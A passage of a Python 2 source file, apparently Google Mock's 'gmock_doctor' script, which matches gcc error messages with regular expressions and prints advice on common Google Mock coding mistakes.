'AddressSatisfies',
'AllOf',
'An',
'AnyOf',
'ContainerEq',
'Contains',
'ContainsRegex',
'DoubleEq',
'ElementsAre',
'ElementsAreArray',
'EndsWith',
'Eq',
'Field',
'FloatEq',
'Ge',
'Gt',
'HasSubstr',
'IsInitializedProto',
'Le',
'Lt',
'MatcherCast',
'Matches',
'MatchesRegex',
'NanSensitiveDoubleEq',
'NanSensitiveFloatEq',
'Ne',
'Not',
'NotNull',
'Pointee',
'Property',
'Ref',
'ResultOf',
'SafeMatcherCast',
'StartsWith',
'StrCaseEq',
'StrCaseNe',
'StrEq',
'StrNe',
'Truly',
'TypedEq',
'Value',
# Actions
'Assign',
'ByRef',
'DeleteArg',
'DoAll',
'DoDefault',
'IgnoreResult',
'Invoke',
'InvokeArgument',
'InvokeWithoutArgs',
'Return',
'ReturnNew',
'ReturnNull',
'ReturnRef',
'SaveArg',
'SetArgReferee',
'SetArgumentPointee',
'SetArrayArgument',
'SetErrnoAndReturn',
'Throw',
'WithArg',
'WithArgs',
'WithoutArgs',
# Cardinalities
'AnyNumber',
'AtLeast',
'AtMost',
'Between',
'Exactly',
# Sequences
'InSequence',
'Sequence',
# Misc
'DefaultValue',
'Mock',
]
# Regex for matching source file path and line number in gcc's errors.
_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):\s+'
def _FindAllMatches(regex, s):
"""Generates all matches of regex in string s."""
r = re.compile(regex)
return r.finditer(s)
def _GenericDiagnoser(short_name, long_name, regex, diagnosis, msg):
"""Diagnoses the given disease by pattern matching.
Args:
short_name: Short name of the disease.
long_name: Long name of the disease.
regex: Regex for matching the symptoms.
diagnosis: Pattern for formatting the diagnosis.
msg: Gcc's error messages.
Yields:
Tuples of the form
(short name of disease, long name of disease, diagnosis).
"""
diagnosis = '%(file)s:%(line)s:' + diagnosis
for m in _FindAllMatches(regex, msg):
yield (short_name, long_name, diagnosis % m.groupdict())
def _NeedToReturnReferenceDiagnoser(msg):
"""Diagnoses the NRR disease, given the error messages by gcc."""
regex = (r'In member function \'testing::internal::ReturnAction<R>.*\n'
+ _FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: creating array with negative size')
diagnosis = """
You are using an Return() action in a function that returns a reference.
Please use ReturnRef() instead."""
return _GenericDiagnoser('NRR', 'Need to Return Reference',
regex, diagnosis, msg)
def _NeedToReturnSomethingDiagnoser(msg):
"""Diagnoses the NRS disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE +
r'(instantiated from here\n.'
r'*gmock.*actions\.h.*error: void value not ignored)'
r'|(error: control reaches end of non-void function)')
diagnosis = """
You are using an action that returns void, but it needs to return
*something*. Please tell it *what* to return. Perhaps you can use
the pattern DoAll(some_action, Return(some_value))?"""
return _GenericDiagnoser('NRS', 'Need to Return Something',
regex, diagnosis, msg)
def _NeedToReturnNothingDiagnoser(msg):
"""Diagnoses the NRN disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: instantiation of '
r'\'testing::internal::ReturnAction<R>::Impl<F>::value_\' '
r'as type \'void\'')
diagnosis = """
You are using an action that returns *something*, but it needs to return
void. Please use a void-returning action instead.
All actions but the last in DoAll(...) must return void. Perhaps you need
to re-arrange the order of actions in a DoAll(), if you are using one?"""
return _GenericDiagnoser('NRN', 'Need to Return Nothing',
regex, diagnosis, msg)
def _IncompleteByReferenceArgumentDiagnoser(msg):
"""Diagnoses the IBRA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-printers\.h.*error: invalid application of '
r'\'sizeof\' to incomplete type \'(?P<type>.*)\'')
diagnosis = """
In order to mock this function, Google Mock needs to see the definition
of type "%(type)s" - declaration alone is not enough. Either #include
the header that defines it, or change the argument to be passed
by pointer."""
return _GenericDiagnoser('IBRA', 'Incomplete By-Reference Argument Type',
regex, diagnosis, msg)
def _OverloadedFunctionMatcherDiagnoser(msg):
"""Diagnoses the OFM disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly\(<unresolved overloaded function type>\)')
diagnosis = """
The argument you gave to Truly() is an overloaded function. Please tell
gcc which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool Foo(int n);
you should write
Truly(static_cast<bool (*)(int n)>(Foo))"""
return _GenericDiagnoser('OFM', 'Overloaded Function Matcher',
regex, diagnosis, msg)
def _OverloadedFunctionActionDiagnoser(msg):
"""Diagnoses the OFA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: no matching function for call to \'Invoke\('
r'<unresolved overloaded function type>')
diagnosis = """
You are passing an overloaded function to Invoke(). Please tell gcc
which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool MyFunction(int n, double x);
you should write something like
Invoke(static_cast<bool (*)(int n, double x)>(MyFunction))"""
return _GenericDiagnoser('OFA', 'Overloaded Function Action',
regex, diagnosis, msg)
def _OverloadedMethodActionDiagnoser1(msg):
"""Diagnoses the OMA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: '
r'.*no matching function for call to \'Invoke\(.*, '
r'unresolved overloaded function type>')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell gcc which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
regex, diagnosis, msg)
def _MockObjectPointerDiagnoser(msg):
"""Diagnoses the MOP disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: request for member '
r'\'gmock_(?P<method>.+)\' in \'(?P<mock_object>.+)\', '
r'which is of non-class type \'(.*::)*(?P<class_name>.+)\*\'')
diagnosis = """
The first argument to ON_CALL() and EXPECT_CALL() must be a mock *object*,
not a *pointer* to it. Please write '*(%(mock_object)s)' instead of
'%(mock_object)s' as your first argument.
For example, given the mock class:
class %(class_name)s : public ... {
...
MOCK_METHOD0(%(method)s, ...);
};
and the following mock instance:
%(class_name)s* mock_ptr = ...
you should use the EXPECT_CALL like this:
EXPECT_CALL(*mock_ptr, %(method)s(...));"""
return _GenericDiagnoser('MOP', 'Mock Object Pointer',
regex, diagnosis, msg)
def _OverloadedMethodActionDiagnoser2(msg):
"""Diagnoses the OMA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Invoke\(.+, <unresolved overloaded function type>\)')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell gcc which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
regex, diagnosis, msg)
def _NeedToUseSymbolDiagnoser(msg):
"""Diagnoses the NUS disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: \'(?P<symbol>.+)\' '
r'(was not declared in this scope|has not been declared)')
diagnosis = """
'%(symbol)s' is defined by Google Mock in the testing namespace.
Did you forget to write
using testing::%(symbol)s;
?"""
for m in _FindAllMatches(regex, msg):
symbol = m.groupdict()['symbol']
if symbol in _COMMON_GMOCK_SYMBOLS:
yield ('NUS', 'Need to Use Symbol', diagnosis % m.groupdict())
def _NeedToUseReturnNullDiagnoser(msg):
"""Diagnoses the NRNULL disease, given the error messages by gcc."""
regex = ('instantiated from \'testing::internal::ReturnAction<R>'
'::operator testing::Action<Func>\(\) const.*\n' +
_FILE_LINE_RE + r'instantiated from here\n'
r'.*error: no matching function for call to \'implicit_cast\('
r'long int&\)')
diagnosis = """
You are probably calling Return(NULL) and the compiler isn't sure how to turn
NULL into the right type. Use ReturnNull() instead.
Note: the line number may be off; please fix all instances of Return(NULL)."""
return _GenericDiagnoser('NRNULL', 'Need to use ReturnNull',
regex, diagnosis, msg)
_TTB_DIAGNOSIS = """
In a mock class template, types or typedefs defined in the base class
template are *not* automatically visible. This is how C++ works. Before
you can use a type or typedef named %(type)s defined in base class Base<T>, you
need to make it visible. One way to do it is:
typedef typename Base<T>::%(type)s %(type)s;"""
def _TypeInTemplatedBaseDiagnoser1(msg):
"""Diagnoses the TTB disease, given the error messages by gcc.
This version works when the type is used as the mock function's return
type.
"""
gcc_4_3_1_regex = (
r'In member function \'int .*\n' + _FILE_LINE_RE +
r'error: a function call cannot appear in a constant-expression')
gcc_4_4_0_regex = (
r'error: a function call cannot appear in a constant-expression'
+ _FILE_LINE_RE + r'error: template argument 1 is invalid\n')
diagnosis = _TTB_DIAGNOSIS % {'type': 'Foo'}
return (list(_GenericDiagnoser('TTB', 'Type in Template Base',
gcc_4_3_1_regex, diagnosis, msg)) +
list(_GenericDiagnoser('TTB', 'Type in Template Base',
gcc_4_4_0_regex, diagnosis, msg)))
def _TypeInTemplatedBaseDiagnoser2(msg):
"""Diagnoses the TTB disease, given the error messages by gcc.
This version works when the type is used as the mock function's sole
parameter type.
"""
regex = (_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n')
return _GenericDiagnoser('TTB', 'Type in Template Base',
regex, _TTB_DIAGNOSIS, msg)
def _TypeInTemplatedBaseDiagnoser3(msg):
"""Diagnoses the TTB disease, given the error messages by gcc.
This version works when the type is used as a parameter of a mock
function that has multiple parameters.
"""
regex = (r'error: expected `;\' before \'::\' token\n'
+ _FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n'
r'.*error: \'.+\' was not declared in this scope')
return _GenericDiagnoser('TTB', 'Type in Template Base',
regex, _TTB_DIAGNOSIS, msg)
def _WrongMockMethodMacroDiagnoser(msg):
"""Diagnoses the WMM disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE +
r'.*this_method_does_not_take_(?P<wrong_args>\d+)_argument.*\n'
r'.*\n'
r'.*candidates are.*FunctionMocker<[^>]+A(?P<args>\d+)\)>')
diagnosis = """
You are using MOCK_METHOD%(wrong_args)s to define a mock method that has
%(args)s arguments. Use MOCK_METHOD%(args)s (or MOCK_CONST_METHOD%(args)s,
MOCK_METHOD%(args)s_T, MOCK_CONST_METHOD%(args)s_T as appropriate) instead."""
return _GenericDiagnoser('WMM', 'Wrong MOCK_METHODn Macro',
regex, diagnosis, msg)
def _WrongParenPositionDiagnoser(msg):
"""Diagnoses the WPP disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE +
r'error:.*testing::internal::MockSpec<.* has no member named \''
r'(?P<method>\w+)\'')
diagnosis = """
The closing parenthesis of ON_CALL or EXPECT_CALL should be *before*
".%(method)s". For example, you should write:
EXPECT_CALL(my_mock, Foo(_)).%(method)s(...);
instead of:
EXPECT_CALL(my_mock, Foo(_).%(method)s(...));"""
return _GenericDiagnoser('WPP', 'Wrong Parenthesis Position',
regex, diagnosis, msg)
_DIAGNOSERS = [
_IncompleteByReferenceArgumentDiagnoser,
_MockObjectPointerDiagnoser,
_NeedToReturnNothingDiagnoser,
_NeedToReturnReferenceDiagnoser,
_NeedToReturnSomethingDiagnoser,
_NeedToUseReturnNullDiagnoser,
_NeedToUseSymbolDiagnoser,
_OverloadedFunctionActionDiagnoser,
_OverloadedFunctionMatcherDiagnoser,
_OverloadedMethodActionDiagnoser1,
_OverloadedMethodActionDiagnoser2,
_TypeInTemplatedBaseDiagnoser1,
_TypeInTemplatedBaseDiagnoser2,
_TypeInTemplatedBaseDiagnoser3,
_WrongMockMethodMacroDiagnoser,
_WrongParenPositionDiagnoser,
]
def Diagnose(msg):
"""Generates all possible diagnoses given the gcc error message."""
diagnoses = []
for diagnoser in _DIAGNOSERS:
for diag in diagnoser(msg):
diagnosis = '[%s - %s]\n%s' % diag
if not diagnosis in diagnoses:
diagnoses.append(diagnosis)
return diagnoses
def main():
print ('Google Mock Doctor v%s - '
'diagnoses problems in code using Google Mock.' % _VERSION)
if sys.stdin.isatty():
print ('Please copy and paste the compiler errors here. Press c-D when '
'you are done:')
else:
print 'Waiting for compiler errors on stdin . . .'
msg = sys.stdin.read().strip()
diagnoses = Diagnose(msg)
count = len(diagnoses)
if not count:
print '\nGcc complained:'
print '8<------------------------------------------------------------'
print msg
print '------------------------------------------------------------>8'
print """
Uh-oh, I'm not smart enough to figure out what the problem is. :-(
However...
If you send your source code and gcc's error messages to
googlemock@googlegroups.com, you can be helped and I can get smarter --
win-win for us!"""
else:
print '------------------------------------------------------------'
print 'Your code appears to have the following',
if count > 1:
print '%s diseases:' % (count,)
else:
print 'disease:'
i = 0
for d in diagnoses:
i += 1
if count > 1:
print '\n#%s:' % (i,)
print d
print """
How did I do? If you think I'm wrong or unhelpful, please send your
source code and gcc's error messages to googlemock@googlegroups.com. Then
you can be helped and I can get smarter -- I promise I won't be upset!"""
if __name__ == '__main__':
main()
|
apache-2.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.